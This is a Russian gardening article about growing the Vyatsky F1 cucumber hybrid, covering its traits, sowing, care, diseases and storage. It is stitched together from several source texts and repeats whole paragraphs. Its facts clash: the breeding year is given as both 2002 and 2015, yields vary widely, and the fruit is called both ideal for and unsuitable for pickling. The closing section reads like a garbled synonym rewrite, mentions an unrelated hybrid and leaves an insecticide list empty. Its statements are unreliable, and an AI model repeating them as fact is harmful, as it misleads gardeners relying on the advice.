26 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Огурец вятский описание выращивание уход фото

Выращивание огурца Вятский f1

Огурец Вятский f1 был создан для участка с неплодородной землей. Предварительно были проведены эксперименты, в ходе которых гибрид показал себя с лучшей стороны: урожай оставался на отличном уровне, а сами плоды не утратили своих вкусовых качеств.

Выращивание огурца Вятский f1

Описание сорта

Партенокарпический огурец f1 относится к раннеспелому типу. Имеет среднерослые кусты с хорошо растущими боковыми побегами и пучковыми завязями.

Растение подходит и для теплицы, и для открытого грунта. Первый урожай можно получить уже через месяц после проклевывания всходов.

Куст по плетению относится к среднему типу с пучковой формой завязи. Нуждается при выращивании в формировании ствола. В период усиленного роста проводится удаление 2 нижних боковых петель. Также необходимо следить за развитием основного столба. При достижении верха шпалеры купируется рост, 2 листка прищипываются.

Описание гибрида говорит о том, что он обладает нежной мякотью без пустот, продолговатой цилиндрической формой, имеет бугорки на поверхности. Плоды не горчат, не желтеют.

Первый урожай, при правильном уходе, собирают уже в июне. Плодоношение длится до самой осени. Один куст дает, в среднем, до 12 кг.

Преимущества и недостатки

Сорт обладает рядом преимуществ:

  • хорошая урожайность;
  • подходит для регионов с прохладным летом;
  • плодоношение происходит даже при нерегулярном поливе;
  • отсутствие горечи в плодах;
  • устойчивость к заболеваниям (мучнистая роса, корневая гниль, огуречная мозаика);
  • продолжительное плодоношение.

К недостаткам Вятского огурца относят только стоимость, но вкус и плодоношение все компенсируют.

Выращивание

Для проверки всхожести посевного материала необходимо приготовить соляной раствор. Пустые – будут на поверхности, а пригодные для посева останутся на дне.

Если предполагается закладка в открытый грунт, необходимо подождать пока температура почвы будет не менее 12°C и исключится риск утренних заморозков.

Земля должна быть подготовлена с осени, перекопана и подкормлена, а семена после посева накрываются агроволокном или пленкой.

Посадка семян на рассаду

Подготовленные семена огурца слегка прогревают и помещают в неконцентрированный раствор перманганата калия (марганца), затем их сушат.

Также для всхожести можно использовать растворы, стимулирующие рост. После этого посевной материал закладывают в политые теплой водой лунки не выше 3 см к поверхности.

Растения нужно поливать теплой водой

Если правильно провести посевные работы и обеспечить комфортные условия в виде влаги, света и тепла, растения будут иметь мощные стебли и большие листья.

Пересадка рассады в грунт

При появлении у растений 4-6 листиков можно осуществлять пересадку рассады, при этом учитывают достаточный прогрев почвы 10-12°C. В подготовленной земле выкапываются лунки (2 саженца на м²).

Рекомендуют использовать для посадки участок, на котором ранее росли картофель, петрушка или капуста.

Вятские огурцы имеют свои особенности выращивания.

  • Чтобы получить большой урожай, необходимо обеспечить своевременную прополку.
  • На этапе созревания нужно проводить дополнительную подкормку. Для этого подойдет перегной, сухая зола или куриный помет.
  • Также им нужен умеренный полив теплой водой с периодичностью 1 раз в 3 дня. В период образования цвета и созревания, полив проводят каждый день или через день.

Культура не любит затвердевшего грунта. Необходимо периодически рыхлить почву, не цепляя корневую систему.

В период вегетации рекомендована подкормка. Для этого подойдет дрожжевая смесь: 1 пачку дрожжей растворите в 10 л воды и оставьте настояться на 3 дня. Этим удобрением можно обработать культуру.

Отзывы садоводов

По отзывам огородников, Вятский огурец f1 заслуживает похвалы, благодаря своему высокому уровню плодоношения. По описанию, сорт больше подходит для салатов, чем для консервации.

Огурец «Вятский f1»: правила посадки и выращивания

Вятский F1 – гибридный партенокарпический сорт огурца. Входит в государственный реестр подходящих для выращивания в домашних условиях культур. Выведен в 2002 году компанией «АгроСемТомс». Возможно культивирование в любом регионе умеренного климатического пояса. Отлично растёт на чернозёмных и суглинистых почвах. Принадлежность к гибридным культурам даёт растению повышенный иммунитет и ряд других преимуществ. Плоды среднего размера с приятным вкусом.

Характеристика куста и плода

Куст Вятского огурца относят к среднеплетистому типу. Высота 50-60 см. Полного роста достигает через три недели после высадки в открытый грунт. Завязи имеют пучковую форму. В одной связке образуется до семи пучков. У куста обычно очень хорошо развиты побеги. Тип цветения женский. Число цветов в пазухах листьев достигает трёх. Цвет стебля и листьев – салатовый.

Листья, стебли и побеги почти полностью гладкие, по мере роста иногда покрываются ворсинками. Листья некрупные, имеют форму сердца. Толщина стебля – 1,5 см. Она делает его устойчивым, защищает от надлома даже под тяжестью плодов.

Характеристика плода:
  1. Форма вытянутая, всегда идеально прямая.
  2. Овощи ярко-зеленого цвета.
  3. На молодых плодах есть колючки небольшого размера, кожица бугорчатая. Обычно они расположены очень близко друг к другу.
  4. Длина зеленцов максимум 13 см.
  5. Диаметр созревшего плода – 4 см, вес достигает 140 г.

Этот гибрид называют супер-скороспелым. Урожай собирают уже в июне – через месяц после посадки в открытый грунт, то есть приблизительно через 5-6 недель после всходов. Мякоть огурца нежная, светло-зеленого оттенка. На разрезе нет пустот. Мякоть и кожица даже у «полежавших» огурцов не горчат.

Хозяйки используют этот сорт для различных кулинарных целей:
  • маринование;
  • засолка;
  • приготовление салатов.

Вятский огурец особенно хорошо подходит для маринования. Плотность этого сорта делает Вятский F1 одним из лучших для приготовления вкусных домашних овощных салатов. При приготовлении и мариновании плоды Вятского сохраняют хруст и вкус, мякоть остаётся такой же плотной и аппетитной. В целом, кулинарное предназначение Вятского сорта разнообразное.

Основные показатели

Вятский F1 – один из наиболее высокоурожайных сортов не корнишонного типа. Один куст за сезон даёт 7-7,5 кг урожая. С одного м 2 собирают до 14,5 кг готовых аппетитных огурчиков. Такой высокий и качественный урожай получается из-за гибридных свойств Вятского огурчика. Урожайность одинаковая и при выращивании в теплице, и в открытом грунте. На количество конечных плодов влияет мало факторов, но есть среди них один особенно важные – качество посевного материала – семян. Для выращивания необходимо выбрать наиболее полновесные и тогда урожай гарантированно получится качественным и очень вкусным.

Эти огурчики очень ценятся как просто любителями поесть огурцы, так и огородниками. Это происходит благодаря целому ряду преимуществ сорт:

  1. Отличный вкус. Есть такие огурчики – одно удовольствие. Овощи не горькие, приятные сладкие на вкус.
  2. Хруст. Огурцы в первую очередь часто ассоциируются с характерным звуком при надкусывании. Так приятно есть молодой огурчик, похрустывая. Вятский сохраняет хруст даже при длительном хранении и после маринования.
  3. Длительное и бесперебойное плодоношение. Первый урожай можно собрать уже в июне, а последний – в октябре. При этом вкус не портится, а хруст не исчезает.
  4. Одинаково хорошо растёт в теплице и в открытом грунте.
  5. Аппетитный вид делает Вятский отличным сортом для выращивания на продажу.

Основной недостаток – цена посевного материала. Из-за высокого качества конечного продукта цена на семена Вятского выше среднего. При этом есть риск нарваться на недобросовестных продавцов. Например, неправильное хранение семян значительно замедляет скорость созревания и снижает устойчивость растения к вирусам и влиянию бактерий. При соблюдении правил хранения, посадки семян и ухода за рассадой у сорта нет никаких недостатков.

Вятский F1 – партенокарпический сорт. Это оплодотворение у растений без опыления. В таком случае семена не образуются совсем или появляются в незначительном количестве. Иногда такие культуры называют самоопыляемыми. Среди огурцов практика самоопыления довольно распространена. На вкус и качество урожая партенокарпия никак не влияет.

Устойчивость к болезням и вредителям

Гибридные сорта – одни из наиболее устойчивых ко многими вирусным и бактериальным заболеваниям. У Вятского огурчика есть стойкий иммунитет к:

  • огуречной мозаике;
  • мучнистой росе;
  • ложной мучнистой росе;
  • оливковой пятнистости;
  • корневой гнили.

Сорт уже был выведен с устойчивостью к этим неприятным огуречным заболеваниям. Однако это не значит, что нужно пренебрегать обеззараживающими процедурами. Есть несколько заболеваний, которые способны нанести вред этому сорту:

  • бактериоз;
  • серая гниль;
  • корневая гниль.

Для профилактики этих болезней рекомендуется проводить превентивную обработку семян и посева средством Превикур. Он защищает семена от микробов и предотвращает распространение бактерий. При выявлении симптомов любых заболеваний необходимо сразу провести профилактическую обработку. Она предполагает внесение под корень различных полезных народных средств. Хорошо действует луковая шелуха, молоко с мёдом, зола, марганцовка. Принцип действия у всех этих растений идентичный: обеззараживание и защита нежной корневой системы молодого огурчика.

Для борьбы с такими насекомыми используют инсектицидные препараты или народные средства. Лучшие инсектициды:

Все они уничтожают взрослых личинок и маленьких зародышей. Преимущества таких средств в универсальности. Их можно использовать на разных стадиях развития насекомых. Однако необходимо постоянно осматривать растения, чтобы вовремя определить присутствие тех или иных насекомых или их зародышей.

В целом Вятский сорт способен адаптироваться к абсолютно любым условиям. Если правильно обеспечить уход за растением, своевременно его поливать и рыхлить – неблагоприятные условия ничем не угрожают кустику.

Особенности агротехники сорта

Вятский огурец можно посадить с помощью семян сразу в открытый грунт. Предварительной подготовки рассады не требуется. На первом этапе необходимо подобрать качественный материал для посадок. Он может оказаться слабым или пустым, и тогда куст не будет плодоносить. Для проверки семян их замачивают в соляном растворе. Две столовые ложки поваренной или одну морской соли разводят в литре воды. Ненадолго в этот раствор помещают семена. Те, что осели на дно – пригодны для посадки, всплывшие семена пустые и бесполезные. Затем семена обязательно:

  • прогревают на солнце;
  • обеззараживают в растворе марганцовки.

Позже их помещают в мокрую тряпку на 3-4 дня для прорастания. Ткань необходимо постоянно увлажнять. Для высадки в открытый грунт семена пригодны уже с момента появления первых листочков. Если температура почвы не опускается ниже 10 о С в течение одной недели, то семена смело можно высаживать на улицу или в теплицу.

Рекомендуется выбрать хорошо освещённое место, в то же время, защищённое от сквозняков. Грунт необходимо предварительно разрыхлить, ещё осенью тщательно очистить его от прошлогодних посадок и мусора и удобрить. За 30 минут до посева тщательно увлажнить почву тёплой водой.

  • лунки глубиной 4 см;
  • на расстоянии 35-45 см друг от друга.

  1. Прополку необходимо осуществлять часто, по мере появления сорняков. Для Вятского сорта необходим постоянный доступ кислорода к корням, который перекрывается в случае появления сорняков. Своевременная прополка предотвращает также развитие некоторых вирусных заболеваний. С прополкой также уничтожаются вредители, который являются разносчиками вирусов.
  2. Умеренный полив. Хотя обычно говорят, что огурцы лучше переувлажнить, чем недодать воды, с Вятским ситуация немного другая. Полив должен быть умеренным, один раз в три дня. Воду использовать только тёплую и вносить прямо под корень. Лучше поливать утром или вечером, когда солнце менее активно. В периоды цветения и активного созревания плодов подачу воды увеличивают до одного раза в день.
  3. Своевременная дополнительная подкормка. Когда идёт период активного цветения или образуются первые плоды, растению требуется много сил. Внесение дополнительных подкормок обогащает растение, придаёт ему сил. На стадии цветения огурцам требуется больше азота, а в момент формирования молодых плодов – больше натуральных удобрений, идеально, если это будет навоз или мочевина.
  4. Подвязка. Это важный этап. Она облегчает развитие стеблей и побегов, защищает стебли от поломки. Для подвязки заранее подготавливают вертикальные шпалеры. Их плотно вкручивают в землю и по мере роста кустов, их подвязывают.
  5. Рыхление почвы. Через плотную почву хуже проходит кислород и солнечные лучи, поэтому ее обязательно рыхлить.

Вятский огурец хорошо хранится. Его достаточно поместить в сухое помещение и оградить от других овощей и фруктов. В холодильнике такой огурчик тоже может долго сохранять свой вкус и цвет. Для этого его помещают в ледяную воду. Жидкость необходимо менять раз в два дня.

Отзывы

Любителям огурцов он нравится за аппетитный вид, а садоводам – за неприхотливость в уходе. Особенность Вятского огурца – высокая урожайность.

Потрясающий сорт. Пожалуй, один из самых красивых среди тех, что я сажала. Огурцы все один к одному – ровные и красивые. В этом году сажала только его и не пожалела. Любое блюдо с огурцом было супер-вкусным. Аппетитные салаты, хрустящие маринованные огурчики – с Вятским огурцом удавалось всё! Рада, что среди всех сортов выбрала именно его.

Вятский F1 – удивительный сорт. У меня раньше не было ни одного года, когда бы огурцы не болели. То огуречная мозаика, то корневая гниль. Я уже не знала, как бороться. В этом году посадила сорт, о котором услышала в первый раз. Ни одной болезни за весь сезон. Это отличный результат. Ещё очень понравилось, что в конце мая я посадила семена в грунт, а в конце июня я уже наслаждалась молодыми плодами.

Качественный вид, как с картинки. Выращиваем Вятский именно на продажу, ни один огурец не имел такого успеха, как этот. Раскупают моментально. В уходе неприхотлив, обычный огурец. Очень понравился этот опыт, буду выращивать ещё.

Вятский F1 – высококачественный сорт, подходящий для выращивания в теплице и открытом грунте. Преимущества сорта – неприхотливость в уходе и не подверженность болезням.

Огурец Вятский описание и характеристика сорта выращивание и уход с фото

Что представляет собой огурец Вятский?

Далее будет рассмотрено описание сорта. Культура выведена сравнительно недавно — в 2015 году. За короткий промежуток времени она успела получить положительные отзывы от овощеводов.

Вятский f1 относится к партенокарпическим гибридам женского типа цветения. Обозначение «партенокарпический гибрид» говорит о том, что сорт образовывает свои плоды без опыления. Растение удобно растить в теплицах, где практически нет насекомых.

Партенокарпические огурцы имеют ряд преимуществ, среди которых:

  • плоды без горечи;
  • быстрый рост;
  • длительное плодоношение;
  • то, что они не нуждаются в опылении насекомыми;
  • ровная форма плодов.

Овощеводы любят Вятич за его суперскороспелость. Первый урожай поспевает уже через месяц после всходов рассады. Завязи пучковатые. Культура не прихотлива к уходу и качеству почвы. Сорт имеет иммунитет ко многим распространенным заболеваниям. Выращивать огурец можно в открытом и закрытом грунте.

Гибрид без проблем переносит кратковременную засуху, дожди, прохладное лето, резкие перепады температур. Нет ограничений по регионам. Огурец хорошо растет в умеренно-климатическом поясе. Семена продаются в разных странах.

Далее будет рассмотрено описание сорта. Культура выведена сравнительно недавно – в 2015 году. За короткий промежуток времени она успела получить положительные отзывы от овощеводов.

Вятский f1 относится к партенокарпическим гибридам женского типа цветения. Обозначение “партенокарпический гибрид” говорит о том, что сорт образовывает свои плоды без опыления. Растение удобно растить в теплицах, где практически нет насекомых.

Характеристики плодов

Зеленцы имеют цилиндрическую форму. Поверхность бугорчатая, с маленькими белыми шипами. Средняя длина 12 см. Диаметр 2-4 см.

Каждый плод весит от 100 до 130 г. Мякоть мягкая, нежная. В ней нет пустот. Огурцы не горькие. Вкус насыщенный классический. Аромат слабый. Даже если плоды перезрели, они не начинают желтеть.

Плоды хорошо хранятся и могут подвергаться длительной транспортировке. Благодаря этим характеристикам сорт выращивают в коммерческих целях.

Первый урожай вятских огурцов дачники собирают в июне. Зеленцы довольно быстро созревают. Плоды можно собирать до осени. Свежий урожай дачники снимают через каждые 4-6 суток.С одного куста можно получить 10-12 кг огурцов.

Особенности выращивания

Огурцы «Вятский f1» на протяжении всего сезона выращивания нуждаются в прополках, поливах и подкормках. Растение необходимо подвязывать на шпалеры. Огурцы очень плохо переносят холод и переизбыток влажности, поэтому требуется проводить умеренные поливы исключительно теплой водой. До плодоношения растения нужно поливать каждые три дня, а на этапе созревания зеленцов следует перейти на ежедневный полив.

Огурец Вятич хорошо растет не на всех участках, для его посадки подходит среднеглинистая почва. Семена сеют не глубже, чем на 3 см.

Для рассадного способа выращивания можно сеять семена в конце февраля либо начале марта. Когда земля достаточно прогреется, минует угроза заморозков, можно высаживать сеянцы в открытый грунт, при этом температура должна быть не ниже 18°С. Кусты необходимо сажать редко, чтобы они не затеняли друг друга и хорошо плодоносили.

Важно! Рекомендуемая схема — 2 куста на 1 кв. м. Растение можно сразу же привязать к опоре.

Посадки нуждаются в регулярных поливах и удобрении. Важно поливать часто, но понемногу: каждый день по 0,5 литра теплой отстоянной вод на каждый куст. Можно использовать капельный полив.

Обратите внимание! Почву не стоит переувлажнять, так как застой воды провоцирует загнивание корневой системы. Также необходимо следить за тем, чтобы не образовывалась корка на поверхности земли. Важно рыхлить землю и удалять сорняки.

Спустя 15 дней с момента высадки в почву растение можно удобрять. За сезон подкормки необходимо внести 3-4 раза. Можно использовать органические удобрения:

  • смешать куриный помет и воду в равных долях. Закрыть и оставить на 7-10 дней перебродить;
  • процедить и разводить настой чистой водой в пропорции 1:10.

Под каждый куст можно вносить 0.5 л такой подкормки. Можно использовать минеральные удобрения. Для этого смешивают:

  • 10 гр. аммиачной селитры;
  • 10 гр. суперфосфата;
  • 10 гр. калийной соли;
  • 10 литров воды.

Подкормка огурцов минеральными удобрениями

В период плодоношения количество калия увеличивают.

Огурец Вятский необходимо пасынковать. Для повышения урожайности стоит сформировать один стебель, для этого по мере необходимости удаляют все пасынки. В каждом узле образуется до 5 цветков.

В течение 40 дней от первых восходов можно собирать первые плоды — это раннеспелый сорт. Собирают огурцы в утреннее время, когда они набирают максимум влаги, через каждый 2 дня. При правильном уходе с одного кв. м можно собрать за сезон до 20 кг плодов.

Важно! Не стоит допускать перерастания, так как это отражается на урожайности.

Хотя растение устойчиво к заболеваниям, важно следить за состоянием листьев. При первом появлении тли и других вредителей листья просто удаляют, а если их достаточно много, необходимо обработать безопасными препаратами. Например, опрыскать теплым раствором хозяйственного мыла.

При первых признаках болезней стоит обработать посадки специальными препаратами, выбирая их в зависимости от симптомов.

Огурцы универсального назначения, хрустящие, без горечи. Сорт можно выращивать как для личного использования, так и в коммерческих целях.

Как осуществляется выращивание сорта?

Несмотря на то что огурец является сильным гибридом, он нуждается в соблюдении правил посадки.

Рассада высаживается в апреле. Огурцы растут очень быстро. За несколько недель на почве, где были посеяны семена, появятся зеленые заросли.

Семена нужно проверить на всхожесть и удалить слабые семечки. Готовится соляной раствор, в который замачивается посевной материал. Пустые семена всплывут на поверхность. От них нужно избавиться.

Затем семена помещаются в подготовленную почву с опилками. Всходам необходимо обеспечить комфортные условия. Они должны получать достаточно света, влаги, находиться в тепле. Если все эти условия соблюдены, у растений будут толстые стебли и мощные листья.

Высаживать рассаду на грядку лучше всего после появления 4-6 листов. Земля должна быть прогрета до 10°С. Опытные овощеводы советуют сажать огурцы на удобренную почву, в которой ранее росли капуста, картофель или фасоль.

Вятские огурцы любят солнечную сторону участка, где минимальное количество сквозняков. Схема посадки — 1 растение на 50 см земли. У сорта допускается высаживание семян прямо в открытый грунт. Для этого нужно подготовить почву. Она должна быть перекопана, подкормлена с осени. Все корни из земли следует удалить.

Высаживать семена лучше в мае, когда земля прогрелась до 13°С. Вятский не боится перепадов температур, но ростки, которые только появляются, нужно утеплить. Для этого огуречную грядку закрывают пленкой или агроволокном.

Вятские огурцы любят солнечную сторону участка, где минимальное количество сквозняков. Схема посадки – 1 растение на 50 см земли. У сорта допускается высаживание семян прямо в открытый грунт. Для этого нужно подготовить почву. Она должна быть перекопана, подкормлена с осени. Все корни из земли следует удалить.

Правила посадки

Гибридные огурцы «Вятский f1» показывают высокую урожайность при выращивании и в теплице, и в открытом грунте. Правильная подготовка семенного материала к посадке гарантирует высокий урожай. Семена необходимо очень тщательно осмотреть и выбрать наиболее полновесные для выращивания. Дальнейшая предпосевная подготовка семян огурца включает в себя такие последовательные операции, как прогревание, обработка и замачивание.

Высевать семена нужно после угрозы заморозков, когда грунт на грядах прогреется до 10-12 °С. Огурцам необходим высокоплодородный, рыхлый, хорошо проницаемый для воздуха, воды и солнечного тепла грунт. Удобрять и глубоко перекапывать почву под огурцы рекомендуется осенью. Стандартная схема посева семян – 50 х 50 см с заглублением на 3-4 см. Почва во время посева должна быть влажной, при необходимости посадочные лунки нужно обильно полить теплой водой.

Общая характеристика

Начинает плодоносить уже через месяц после высадки в грунт. Урожай составляет до 12,5 кг с куста, который снимают до осени каждые 3-5 дней. Всхожесть составляет 97%.

Куст с пучковой формой завязи. По своему плетению относится к среднему типу. При его выращивании необходимо обратить внимание на развитие и формирование основного стебля. Плоды:

  • имеют длину 10-12 см;
  • их диаметр составляет 4-5 см;
  • средний вес 130 г.

Тип цветения женский, партенокарпический (завязь зеленца формируется без опыления насекомыми). В узле 1-2 цветка с завязью.

Создание благоприятных условий

Сорт Вятский F1 неприхотлив. Но, как и любому растению, ему нужно создать благоприятные для роста условия. Огурцы любят:

  • насыщенную перегноем почву;
  • теплый (свыше 20 о С) и влажный (85–90 %) воздух.

При нехватке воды в почве и в воздухе зеленцы зачастую прекращают свой рост. Это часто происходит в прохладную погоду. При долгом похолодании растение увядает и может заболеть корневыми и стеблевыми гнилями.

При поливке прохладной водой или из-за перепадов температуры днем и ночью, плоды могут сужаться по середине. А при непостоянном поливе огурцы искривляются и принимают неправильную форму.

Для защиты от болезней и вредителей Вятскому не рекомендуются сильнодействующие химикаты, поскольку высокая скорость созревания плодов приводит к увеличению токсичности. После такой обработки сбор огурцов можно проводить только после 20-ти дневного перерыва.

После высадки в грунт, нужно сразу защитить листочки от слизней закрыв их обрезанными бутылками из пластика или стеклянными банками. Болезни могут начать развитие при избытке влаги в воздухе. При первых признаках нездоровья кустика нужно:

  • просушить почву вокруг кустов;
  • засыпать ее золой;
  • проветрить теплицу;
  • прекратить полив.

Пораженные листья оборвать, а здоровые обработать раствором марганцовки. Можно обработать препаратом «Ридомил», но сбор урожая, в этом случае, придется отложить минимум на три недели.

В дождливую погоду, когда влажность почвы и воздуха переходит отметку 80-85% возможно развитие бактериоза. Нужно прекратить полив и хорошо проветрить теплицу. Внести дополнительные удобрения из настоя навоза. При высокой влажности и резких перепадах температур, поливе холодной водой или застоявшемся воздухе из-за чрезмерной плотности посадок Вятский может быть поражен белой гнилью. Плоды и листья, пораженные болезнью удалить. Куст обработать раствором марганцовки и опылить золой.

Удобрять Вятский F1 нужно по потребностям растений:

  1. При недостатке азота листья у растения будут слишком маленькие и светло зеленые, а у плода светлеет конец, загибаясь и заужаясь- удобрить огурцы растворами навоза, мочевины или селитры.
  2. Недостаток калия проявится появлением у листьев коричневой каймы, а у плодов будет раздут кончик, делая их форму грушеобразной — просыпать золу вокруг стеблей.
  3. При недостатке микроэлементов листья станут желто-зелеными. Подкормить настоем луковой шелухи, куриным пометом или йодом (15 капель на 10 л воды).
  4. При недостатке магния листья приобретут мраморную окраску. Обработать почву раствором доломита.
  5. Если огурцы начинают горчить, необходимо дать подкормку кальциевой и калийной селитрой. Это происходит из-за накопления кукурбитацина (вещества, защищающего организм от опухолей) при резкой смене температур или длительном похолодании, поливе холодной водой или неравномерном поливе. И хотя кукурбитацин очень полезен, есть горькие огурцы захочет не всякий.

Сохранить огурцы свежими сложно, поскольку в них содержится 59-97% воды. При подготовке к хранению нужно отобрать сухие и чистые плоды без повреждений.

Перед закладкой огурцы не рекомендуется мыть. Многие плоды выделяют этилен, который ускоряет дозревание плодов, поэтому хранить огурцы необходимо отдельно от остальных овощей и фруктов, таких как яблоки, бананы, персики, груши, помидоры. Самый распространенный способ — не повреждая кожицу, аккуратно уложить огурцы в пластиковые лотки для хранения овощей, обеспечивающие хорошую вентиляцию. Для лучшего доступа воздуха, при хранении в деревянных или картонных коробках огурцы можно проложить газетами или тканью.

При комнатной температуре огурцы сорта Вятский F1 хранятся свежими 5-7 дней. При понижении температуры до 6 оС срок хранения увеличивается вдвое. Если же необходимо сохранить свежесть до середины зимы, оптимальнее всего воспользоваться вакуумной упаковочной машиной или вакуумными контейнерами.

Огурец «Вятский f1»: правила посадки и выращивания

Огурцы «Вятский f1» включены в Государственный реестр Российской Федерации для выращивания в личных приусадебных хозяйствах под пленочными укрытиями. Оригинатором данной гибридной формы является компания «АгроСемТомс».

Описание сорта

Партенокарпический гибридный огурец «Вятский f1» формирует среднерослые и среднеплетистые кусты с пучковыми завязями. Боковые побеги отрастают хорошо. Растение относится к раннеспелым с женским типом цветения и позволяет получить урожай примерно через месяц после появления всходов. Число женских цветков на каждый узел составляет 1-2.

Длина зеленца не превышает 10-14 см, а диаметр на поперечном разрезе составляет 4-5 см. Форма цилиндрическая, поверхность бугорчатая. Мякоть без пустот и горечи. Вкусовые качества плодов очень хорошие. Средний вес товарного зеленца составляет 135 г.

Гибридная форма неприхотлива, обладает отличной устойчивостью к поражению мучнистой росой и вирусом огуречной мозаики. Общая урожайность достигает 12,5 кг/кв. м.

Правила посадки

Гибридные огурцы «Вятский f1» показывают высокую урожайность при выращивании и в теплице, и в открытом грунте. Правильная подготовка семенного материала к посадке гарантирует высокий урожай. Семена необходимо очень тщательно осмотреть и выбрать наиболее полновесные для выращивания. Дальнейшая предпосевная подготовка семян огурца включает в себя такие последовательные операции, как прогревание, обработка и замачивание.

Высевать семена нужно после угрозы заморозков, когда грунт на грядах прогреется до 10-12 °С. Огурцам необходим высокоплодородный, рыхлый, хорошо проницаемый для воздуха, воды и солнечного тепла грунт. Удобрять и глубоко перекапывать почву под огурцы рекомендуется осенью. Стандартная схема посева семян – 50 х 50 см с заглублением на 3-4 см. Почва во время посева должна быть влажной, при необходимости посадочные лунки нужно обильно полить теплой водой.

Особенности выращивания

Огурцы «Вятский f1» на протяжении всего сезона выращивания нуждаются в прополках, поливах и подкормках. Растение необходимо подвязывать на шпалеры. Огурцы очень плохо переносят холод и переизбыток влажности, поэтому требуется проводить умеренные поливы исключительно теплой водой. До плодоношения растения нужно поливать каждые три дня, а на этапе созревания зеленцов следует перейти на ежедневный полив.

Очень важно следить, чтобы на поверхности грунта не появлялась почвенная корка, во избежание этого нужно разрыхлять верхний слой. Следует помнить, что корни у огурцов расположены близко к поверхности грунта и при глубоком или неаккуратном рыхлении они могут быть повреждены. Не стоит забывать о регулярной борьбе с сорными растениями. Пожелтевшие огуречные плети требуется своевременно удалять.

Отзывы огородников

Огурцы «Вятский f1» имеют очень привлекательный внешний вид. Главным преимуществом гибрида является очень высокая урожайность. Назначение плодов салатное, а для засолки и консервирования эти огурцы не подходят. В конце августа при выращивании в открытом грунте растения прекращают расти и плодоносить из-за понижения температурных показателей и утренней холодной росы.

Как посадить огурцы (видео)

По отзывам огородников, огурцы данного сорта формируют довольно длинные плети, в узлах которых висят маленькие и очень вкусные зеленцы. Они очень быстро растут, рано созревают, равномерно наливаются и мало болеют. К недостаткам можно отнести лишь достаточно высокую стоимость семенного материала, однако это компенсируется прекрасными характеристиками получаемого урожая.

В чем прелесть огурца Вятский

Огурцы «Вятский f1» введены в Государственный реестр Российской Федерации с целью выращивания в индивидуальных приусадебных хозяйствах под пленочными укрытиями. Оригинатором этой смешанной формы считается фирма «АгроСемТомс».

Описание сорта

Партенокарпический смешанный огурец «Вятский f1» создает среднерослые и среднеплетистые кустики с пучковыми завязями. Побочные отростки отрастают хорошо. Растение принадлежит к раннеспелым с женским видом цветения и дает возможность приобрести урожай приблизительно через месяц после возникновения всходов. Количество женских цветочков на каждый узел составляет 1-2.

  • Длина зеленца не превосходит 10-14 см, в поперечном разрезе составляет 4-5 см.
  • Модель трубчатая, поверхность бугристая. Пульпа без пустот и горечи.
  • Вкусовые качества плодов весьма отличные. Умеренный вес товарного зеленца составляет 135 г.

Гибридная модель нетребовательна, обладает хорошей стабильностью к поражению мучнистой росой и вирусом огуречной мозаики. Единая урожайность доходит 12,5 кг/1 м 2 .

Характеристика сорта

Среди значительного многообразия смешанных видов огурцов, Вятские выделяются по ряду характеристик:

  • очень большая урожайность;
  • подходят в том числе и для областей с прохладным либо теплым летом с ограниченным поливом;
  • формирует большие плети, в узлах каковых возникают 1-2 завязи;
  • очень ранний вид и не потребует опыления;
  • высокие вкусовые качества;
  • долгое плодоношение.

Как подмечают дачники, подобная оценка перевешивает исключительный недостаток сорта — значительную стоимость семян. Пакет с 8-10 зернами получится в 30 рублей, однако недостаток трудностей при выращивании и большая урожайность целиком возместят данный недостаток.

Высеивание вида огурца Вятский f1 в открытом грунте начинается в апреле, однако даже при его стабильности к морозам первое время грядку с ними рекомендовано прикрывать пленкой либо агроволокном. Под ними растение стремительнее вырастет и предоставит прочные стебли. Урожай в данном виде снимается каждые 3-5 суток.

Особенности выращивания

Как и в любой иной овощной культуре, один из наиболее значимых для значительного урожая факторов считается подбор и подготовка семян. Для того чтобы не сеять пустой либо слабенький посевной материал, необходимо его проконтролировать. Для этого его помещают на некоторое время в соляной раствор. К высадке годны только лишь те семена, что осели на дно.

Лучшее место для грядок данного гибрида — это солнечная сторона участка, защищенная от сквозняков. Грунт должен быть предварительно удобрен, правильнее с осени, и разрыхлен.

Схема посева семян предполагает собой лунки на расстоянии 50х50 см с углублением в 3-4 см. Перед высадкой земля должна быть влажной, в крайнем случае, возможно щедро орошать каждую лунку в отдельности, однако только лишь теплой водой.

Вятский огурец, хотя и нетребователен, однако содержит собственные характерные черты выращивания.
У данного типа имеется ряд условий, осуществление каковых обеспечивает большой сбор:

  • нужна нередкая прополка, а в период созревания зеленцов еще и вспомогательная подкармливание;
  • полив должен быть умеренным (раз в 3 дня) и реализоваться только лишь теплой водой;
  • во время цветения и созревания плодов полив учащается до первого раза в день либо через день;
  • обязательно предварительно подготовить шпалеры либо опоры и по мере роста кустов, подвязывать их.

Огурцы Вятские не любят, если после полива затвердевает грунт, по этой причине основу необходимо каждый раз рыхлить. При этом необходимо иметь в виду, что корневая система данного вида близко находится к поверхности, по этой причине необходимо осуществлять данную работу весьма аккуратно.

Во время вегетативного периода каждые 10 суток вместе с поливом рекомендовано реализовывать подкормку. На 10 л воды берут 10 г мочевины и один литр навоза.

Поливать и подкармливать огурцы возможно только лишь в вечернее время.

Болезни и вредители

Огурцы f1 Вятский устойчивы к таким типам болезней, как:

  • мучнистая роса;
  • огуречная мозаика;
  • ложно — мучнистая роса;
  • оливковая пятнистость;
  • корневая гниль.

Не зависимо от того, что огурец вида Вятский был выведен с устойчивостью к абсолютно всем данным заболеваниям, семена перед высадкой необходимо обезопасить и укрепить.

Пасалимо можно выращивать во всех регионах страны и успешно развивается на открытых грядах и в тепличных условиях. В этой статье вы можете узнать, какие плюсы в выращивании саженцев имеет данный гибрид.

На фото можно рассмотреть огурец Вятский. Огурцы «Вятский f1» имеют весьма интересный внешний вид. Основным превосходством гибрида считается весьма большая урожайность. Предназначение плодов салатное, а для засолки и консервирования данные огурцы не подойдут. В конце августа при выращивании в открытом грунте растения заканчивают расти и плодоносить из-за снижения температурных характеристик и утренней холодной росы.

Видео

Также вы можете посмотреть видеоролик, где опытный садовод расскажет вам о самом простом способе выращивания огурца «Вятский f1» в теплице.

По отзывам огородников, огурцы этого вида формируют достаточно большие плети, в участках которых висят небольшие и весьма аппетитные зеленцы. Они весьма быстро увеличиваются, заблаговременно вызревают, одинаково наливаются и немного болеют. К минусам возможно причислить только довольно значительную стоимость семенного материала, но это возмещается великолепными чертами получаемого урожая.

Ссылка на основную публикацию
Adblock
detector
